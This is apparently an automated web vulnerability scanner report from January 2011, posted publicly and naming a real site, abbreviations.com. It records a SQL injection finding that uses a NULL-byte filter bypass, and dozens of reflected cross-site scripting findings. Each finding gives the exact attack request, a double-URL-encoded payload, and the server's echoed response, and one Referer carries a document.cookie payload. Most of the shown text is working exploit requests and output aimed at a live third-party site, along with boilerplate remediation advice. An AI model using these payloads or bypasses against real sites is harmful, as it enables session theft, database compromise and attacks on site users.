SQL Injection, Cross Site Scripting, abbreviations.com

XSS, SQL Injection DORK | CloudScan Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Tue Jan 25 11:20:04 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

2. Cross-site scripting (reflected)

2.1. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

2.2. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

2.3. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

2.4. http://www.abbreviations.com/abbr.css [REST URL parameter 1]

2.5. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

2.6. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

2.7. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

2.8. http://www.abbreviations.com/abbr.js [REST URL parameter 1]

2.9. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

2.10. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

2.11. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

2.12. http://www.abbreviations.com/abbreviations/ [REST URL parameter 1]

2.13. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

2.14. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

2.15. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

2.16. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

2.17. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

2.18. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

2.19. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

2.20. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

2.21. http://www.abbreviations.com/bs.aspx [st parameter]

2.22. http://www.abbreviations.com/bs.aspx [st parameter]

2.23. http://www.abbreviations.com/bs.aspx [st parameter]

2.24. http://www.abbreviations.com/bs.aspx [st parameter]

2.25. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

2.26. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

2.27. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

2.28. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

2.29. http://www.abbreviations.com/bs2.aspx [st parameter]

2.30. http://www.abbreviations.com/bs2.aspx [st parameter]

2.31. http://www.abbreviations.com/bs2.aspx [st parameter]

2.32. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

2.33. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

2.34. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

2.35. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

2.36. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

2.37. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

2.38. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

2.39. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

2.40. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

2.41. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

2.42. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

2.43. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

2.44. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

2.45. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

2.46. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

2.47. http://www.abbreviations.com/searchAmazon.aspx [REST URL parameter 1]

2.48. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

2.49. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

2.50. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

2.51. http://www.abbreviations.com/searchAmazon.aspx [st parameter]

2.52. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

2.53. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

2.54. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

2.55. http://www.abbreviations.com/searchgoogle.aspx [REST URL parameter 1]

3. Cross-domain Referer leakage

3.1. http://www.abbreviations.com/bs2.aspx

3.2. http://www.abbreviations.com/searchAmazon.aspx

4. Cross-domain script include

4.1. http://www.abbreviations.com/

4.2. http://www.abbreviations.com/bs2.aspx

4.3. http://www.abbreviations.com/justadded.aspx

4.4. http://www.abbreviations.com/random.aspx

4.5. http://www.abbreviations.com/searchAmazon.aspx

5. Content type incorrectly stated

5.1. http://www.abbreviations.com/images/goog.jpg

5.2. http://www.abbreviations.com/images/t.gif



1. SQL injection  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The ltrs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ltrs parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /getsugg.aspx?ltrs=%00' HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:41 GMT
Connection: close
Content-Length: 222

<suggestions>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' GROUP BY ACRONYM ORDER BY ACRONYM ASC LIMIT 15' at line 1</suggestions>

Request 2

GET /getsugg.aspx?ltrs=%00'' HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:44 GMT
Connection: close
Content-Length: 27

<suggestions></suggestions>

2. Cross-site scripting (reflected)  previous  next
There are 55 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.abbreviations.com/abbr.css [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 73595%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9905ecb5304 was submitted in the REST URL parameter 1. This input was echoed as 73595</title><script>alert(1)</script>9905ecb5304 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css73595%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9905ecb5304 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:18 GMT
Content-Length: 27311


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbr.css73595</title><script>alert(1)</script>9905ecb5304 stand for?</title>
...[SNIP]...

2.2. http://www.abbreviations.com/abbr.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74516%2522%253balert%25281%2529%252f%252f44905aad793 was submitted in the REST URL parameter 1. This input was echoed as 74516";alert(1)//44905aad793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css74516%2522%253balert%25281%2529%252f%252f44905aad793 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:38 GMT
Content-Length: 26744


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbr.css74516";alert(1)//44905aad793";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.css74516";alert(1)//44905aad793" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href
...[SNIP]...

2.3. http://www.abbreviations.com/abbr.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93dfb%253cscript%253ealert%25281%2529%253c%252fscript%253ea69817cc1a7 was submitted in the REST URL parameter 1. This input was echoed as 93dfb<script>alert(1)</script>a69817cc1a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css93dfb%253cscript%253ealert%25281%2529%253c%252fscript%253ea69817cc1a7 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:53 GMT
Content-Length: 27061


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>a69817cc1a7";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.css93dfb<script>alert(1)</script>a69817cc1a7" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbr.css93dfb<script>
...[SNIP]...

2.4. http://www.abbreviations.com/abbr.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66679%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a4f7ab6f7 was submitted in the REST URL parameter 1. This input was echoed as 66679"><script>alert(1)</script>9a4f7ab6f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.css66679%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a4f7ab6f7 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:24:24 GMT
Content-Length: 27103


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbr.css66679"><script>alert(1)</script>9a4f7ab6f7 stand for?, What does abbr.css66679">
...[SNIP]...

2.5. http://www.abbreviations.com/abbr.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66a46%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc47256e3b6 was submitted in the REST URL parameter 1. This input was echoed as 66a46</title><script>alert(1)</script>cc47256e3b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.js66a46%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecc47256e3b6 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:27:12 GMT
Content-Length: 27284


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does abbr.js66a46</title><script>alert(1)</script>cc47256e3b6 stand for?</title>
...[SNIP]...

2.6. http://www.abbreviations.com/abbr.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 99dbd%253cscript%253ealert%25281%2529%253c%252fscript%253e23471ee6b28 was submitted in the REST URL parameter 1. This input was echoed as 99dbd<script>alert(1)</script>23471ee6b28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.js99dbd%253cscript%253ealert%25281%2529%253c%252fscript%253e23471ee6b28 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:26:27 GMT
Content-Length: 27049


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>23471ee6b28";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "abbr.js99dbd<script>alert(1)</script>23471ee6b28" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "abbr.js99dbd<script>
...[SNIP]...

2.7. http://www.abbreviations.com/abbr.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c284a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d67615d230 was submitted in the REST URL parameter 1. This input was echoed as c284a"><script>alert(1)</script>7d67615d230 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.jsc284a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7d67615d230 HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:32 GMT
Content-Length: 27122


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does abbr.jsc284a"><script>alert(1)</script>7d67615d230 stand for?, What does abbr.jsc284a">
...[SNIP]...

2.8. http://www.abbreviations.com/abbr.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /abbr.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5e15%2522%253balert%25281%2529%252f%252f7bcb080d8de was submitted in the REST URL parameter 1. This input was echoed as e5e15";alert(1)//7bcb080d8de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /abbr.jse5e15%2522%253balert%25281%2529%252f%252f7bcb080d8de HTTP/1.1
Host: www.abbreviations.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xydeiaqh04djp455gggyiyie; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmb=5591651; __utmc=5591651; __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 22:25:54 GMT
Content-Length: 26717


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "abbr.jse5e15";alert(1)//7bcb080d8de";
window.location.href = URL;
}
function GoToPage(num)
{
